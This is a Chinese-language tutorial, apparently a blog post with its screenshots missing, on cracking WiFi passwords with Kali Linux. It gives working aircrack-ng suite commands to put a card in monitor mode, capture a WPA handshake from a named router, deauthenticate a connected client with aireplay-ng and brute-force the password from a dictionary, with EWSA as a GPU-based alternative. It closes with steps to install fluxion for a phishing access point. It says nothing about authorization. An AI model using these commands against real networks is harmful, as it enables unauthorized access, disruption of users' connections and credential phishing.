1. 前提条件

• 需要无线网卡，kali无法识别电脑自带的网卡。

2. 实验步骤：

2.1 查看网卡

• 命令：airmon-ng

2.2 启动网卡监听模式

• 命令airmon-ng start wlan0
  
• 检查下是否处于监听模型：ifconfig查看一下，如果网卡名加上了mon后则成功
  

2.3 扫描周围wifi

• 命令airodump-ng wlan0mon
  
  • BSSID：路由的MAC地址。
  • PWR：信号强度，越小信号越强。
  • #Data：传输的数据.。
  • CH：信号频道，只有在一个频道才可进行下一步操作。
  • ESSID：wifi的名称，中文的可能会乱码。

2.4 获取wifi密码

• 选取TP-747进行获取

  • -c：指定信道
  • -w：指定抓去握手包的存放位置或者名字
  • –bssid：指定路由器的MAC

• 输入airodump-ng -c 1 –bssid A8:5E:45:EF:6F:80 -w /root wlan0mon
  

  • 可见有一个用户正在使用此wifi
  • 另开一个终端
  • 执行如下命令，一个客户机的MAC，和路由器的MAC
    • -a：指定路由器的MAC
    • -c：指定客户机的MAC

• aireplay-ng -0 2 -a A8:5E:45:EF:6F:80 -c B8:B2:F8:D4:8A:88 wlan0mon
  

• 这时我们看刚刚的终端，然后ctrl+c 退出抓包
  

• 来到保存的目录查看刚刚抓的包，这里的后缀不一定和我一样。
  

• 用kali自带的工具暴力破解密码，aircrack-ng root-09.ivs -w pass.txt，如果字典强大就能找到。
  

  • 失败截图
    

  • 成功截图
    

• 或者使用EWSA来跑字典（可使用GPU破解，效率更高。）打开EWSA软件
  

• 导入刚刚抓到的包
  

• 导入字典
  
  
  

• fluxion搭建钓鱼wifi获取wifi密码

  • 下载fluxion
    • git clone https://github.com/FluxionNetwork/fluxion.git
  • 进入到fluxion目录
    • cd fluxion
  • 安装fluxion
    • ./fluxion.sh -i 第一次需要安装依赖之后就 - ./fluxion.sh就行